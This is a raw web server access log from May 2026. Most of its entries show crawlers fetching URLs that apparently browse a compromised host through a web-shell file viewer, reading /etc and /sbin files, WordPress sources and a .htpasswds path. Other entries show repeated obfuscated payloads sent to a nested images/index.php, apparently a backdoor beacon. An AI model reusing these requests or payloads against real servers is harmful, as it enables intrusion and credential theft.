216.73.217.176 - - [19/May/2026:13:04:10 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-theme.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 17452 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:04:13 +0100] "GET /?fileloc=%2F%2Fsbin%2Fmount.nfs4&path=%2F%2Fsbin HTTP/2" 200 40962 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:04:16 +0100] "GET /?fileloc=%2F%2Fetc%2F.updated&path=%2F%2Fetc HTTP/2" 200 2697 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:02:16 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139353733362p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323133362q6534646263323965336463633939386130303939623930646230346464376139222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:13:04:19 +0100] "GET /?fileloc=%2F%2Fsbin%2Fdnssec-keymgr&path=%2F%2Fsbin HTTP/2" 200 3032 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:04:22 +0100] "GET /?fileloc=%2F%2Fsbin%2Fiptables-restore&path=%2F%2Fsbin HTTP/2" 200 88669 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:04:25 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fblock-editor.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 9424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:04:28 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-theme-json-schema.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 4983 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:13:04:30 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-theme.php?view/item/073618563065 HTTP/1.1" 200 27386 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:13:04:31 +0100] "GET /?fileloc=%2F%2Fsbin%2Febtables-nft-save&path=%2F%2Fsbin HTTP/2" 200 88670 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:04:34 +0100] "GET /?fileloc=%2F%2Fetc%2Fbackupmxhosts&path=%2F%2Fetc HTTP/2" 200 2569 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:04:37 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2F.htpasswds HTTP/2" 200 2896 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:02:38 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139353735382p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323135382q6331303036323963663734303466366335656433316163653063326466306330222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:13:04:40 +0100] "GET /?fileloc=%2F%2Fsbin%2Fchronyd&path=%2F%2Fsbin HTTP/2" 200 174462 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:04:43 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-http-requests-response.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 3879 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:04:46 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-feed-cache.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 3102 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:04:49 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-plugin-dependencies.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 7790 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:04:52 +0100] "GET /?path=%2F%2Fhome%2Favoragems HTTP/2" 200 2631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:13:04:54 +0100] "GET /collect/123013916767 HTTP/1.1" 200 27364 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:13:04:55 +0100] "GET /?path=%2F%2Fhome%2Flanddeptncgov HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:04:58 +0100] "GET /?fileloc=%2F%2Fsbin%2Fiptables-nft-save&path=%2F%2Fsbin HTTP/2" 200 88670 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:03:01 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139353738312p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323138312q3961373663343034333364616437373333346637396664376433353036643032222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:13:05:01 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fcache.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 5163 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:05:04 +0100] "GET /?path=%2F%2Fhome%2Fzentrohq HTTP/2" 200 2630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:05:10 +0100] "GET /?path=%2Fhome%2Fwwwbrevo HTTP/2" 200 2628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:05:12 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-query.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 35639 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:05:15 +0100] "GET /?path=%2F%2Fhome%2Fwalakulu HTTP/2" 200 2630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:05:18 +0100] "GET /?fileloc=%2F%2Fsbin%2Fxfs_db&path=%2F%2Fsbin HTTP/2" 200 284392 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.161 - - [19/May/2026:13:05:18 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-theme.php?view/item/072830434449 HTTP/1.1" 200 27584 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:13:05:21 +0100] "GET /?fileloc=%2F%2Fsbin%2Ffsck.fat&path=%2F%2Fsbin HTTP/2" 200 35244 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:05:24 +0100] "GET /?fileloc=%2F%2Fsbin%2Falternatives&path=%2F%2Fsbin HTTP/2" 200 16231 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:05:27 +0100] "GET /?fileloc=%2F%2Fetc%2Fexim.pl&path=%2F%2Fetc HTTP/2" 200 2676 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:03:28 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139353830382p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323230382q3466663639396439613162333337366631643332363166636264613462383264222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:13:05:30 +0100] "GET /?fileloc=%2F%2Fsbin%2Fdnssec-checkds&path=%2F%2Fsbin HTTP/2" 200 3031 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:05:33 +0100] "GET /?fileloc=%2F%2Fsbin%2Fdnssec-keygen&path=%2F%2Fsbin HTTP/2" 200 18478 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:05:36 +0100] "GET /?path=%2F%2Fhome%2Fhillsunu HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:05:39 +0100] "GET /?fileloc=%2F%2Fsbin%2Fpwunconv&path=%2F%2Fsbin HTTP/2" 200 16563 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:05:42 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fembed.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 13003 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.96 - - [19/May/2026:13:05:42 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-theme.php?view/item/07274977223 HTTP/1.1" 200 27012 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:13:05:45 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-date-query.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 11400 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:05:48 +0100] "GET /?fileloc=%2F%2Fsbin%2Fpure-certd&path=%2F%2Fsbin HTTP/2" 200 7611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:05:51 +0100] "GET /?fileloc=%2F%2Fsbin%2Fgrub2-set-password&path=%2F%2Fsbin HTTP/2" 200 3903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:03:51 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139353833312p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323233312q3566323565613661643964653238383236393366313266303831393564643661222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:13:05:54 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Ffeed-rss2-comments.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 4105 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:05:59 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Ffunctions.wp-styles.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 4942 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:06:01 +0100] "GET /?fileloc=%2F%2Fsbin%2Fiptables-translate&path=%2F%2Fsbin HTTP/2" 200 88667 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:06:04 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fdefault-constants.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 5646 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:06:07 +0100] "GET /?fileloc=%2F%2Fsbin%2Ffsck.vfat&path=%2F%2Fsbin HTTP/2" 200 35245 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.161 - - [19/May/2026:13:06:06 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-signup.php&path=/home/plandeptncgov/public_html HTTP/1.1" 200 27154 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:13:06:10 +0100] "GET /?fileloc=%2F%2Fsbin%2Ffsck.cramfs&path=%2F%2Fsbin HTTP/2" 200 12108 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:06:13 +0100] "GET /?fileloc=%2F%2Fetc%2Fnetworks&path=%2F%2Fetc HTTP/2" 200 2603 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:04:13 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139353835332p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323235332q6664376439316362393933666465313938306332616463343566346532623064222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:13:06:16 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-phpass.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 5084 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:06:19 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-simplepie-file.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 3961 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:06:22 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fatomlib.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 5914 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:06:25 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fcomment-template.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 23600 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:06:28 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-http-ixr-client.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 4009 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.178.8.105 - - [19/May/2026:13:06:28 +0100] "GET /.well-known/traffic-advice HTTP/1.1" 200 4111 "-" "Chrome Privacy Preserving Prefetch Proxy"
72.14.201.146 - - [19/May/2026:13:06:28 +0100] "GET /%E0%B6%A7%E0%B6%BA%E0%B6%BB%E0%B7%8A/ HTTP/2" 200 4076 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36"
216.73.217.176 - - [19/May/2026:13:06:31 +0100] "GET /?fileloc=%2F%2Fsbin%2Fdumpe2fs&path=%2F%2Fsbin HTTP/2" 200 12805 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.96 - - [19/May/2026:13:06:30 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-theme.php?view/item/07533466630 HTTP/1.1" 200 27711 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:13:06:34 +0100] "GET /?fileloc=%2F%2Fsbin%2Fpure-mrtginfo&path=%2F%2Fsbin HTTP/2" 200 5479 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:04:35 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139353837352p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323237352q3962643265303164383838313565323364363738383338386439356534383066222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:13:06:38 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin%2Flink.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin HTTP/2" 200 3668 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:06:40 +0100] "GET /?fileloc=%2F%2Fetc%2Fdbowners&path=%2F%2Fetc HTTP/2" 200 2566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:06:43 +0100] "GET /?fileloc=%2F%2Fetc%2Fnamed.conf&path=%2F%2Fetc HTTP/2" 200 82548 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:06:46 +0100] "GET /?fileloc=%2F%2Fsbin%2Fiptunnel&path=%2F%2Fsbin HTTP/2" 200 10273 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:06:49 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin%2Ferror_log&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin HTTP/2" 200 3357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:06:52 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fbookmark-template.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 5947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.174 - - [19/May/2026:13:06:54 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-theme.php?view/item/07617349469 HTTP/1.1" 200 26782 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:13:06:55 +0100] "GET /?path=%2F%2Fhome%2Fhuhuasi1 HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:13:04:57 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393139353839372p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139323239372q3038643963356263313635393938376231616431356335613637623035623231222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:13:06:58 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-walker-category-dropdown.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 3687 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:01 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Foption.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 21846 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:04 +0100] "GET /?fileloc=%2F%2Fetc%2Fcpspamd.conf&path=%2F%2Fetc HTTP/2" 200 2569 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:07 +0100] "GET /?fileloc=%2F%2Fetc%2Fdemouids&path=%2F%2Fetc HTTP/2" 200 2566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:10 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin%2Fprivacy.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin HTTP/2" 200 3629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:13 +0100] "GET /?fileloc=%2F%2Fsbin%2Fpam_namespace_helper&path=%2F%2Fsbin HTTP/2" 200 2866 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:13:07:16 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-walker-page.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 4685 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
